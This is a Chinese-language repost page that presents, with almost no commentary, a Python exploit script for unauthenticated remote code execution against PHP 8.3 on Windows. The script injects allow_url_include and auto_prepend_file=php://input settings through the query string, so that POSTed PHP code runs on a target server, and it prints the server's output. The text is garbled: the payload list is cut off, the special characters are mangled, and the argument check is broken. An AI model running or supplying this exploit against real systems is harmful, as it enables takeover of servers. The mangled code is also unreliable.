摘要:# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www
直接上代码:
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* ', '' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session for payload in payloads: url = url + "/?�d+allow_url_include=1+�d+auto_prepend_file=php://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text)if __name__ == '__main__': title if(len(sys.argv) \n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])来源:Web3软件开发一点号
免责声明:本站系转载,并不代表本网赞同其观点和对其真实性负责。如涉及作品内容、版权和其它问题,请在30日内与本站联系,我们将在第一时间删除内容!
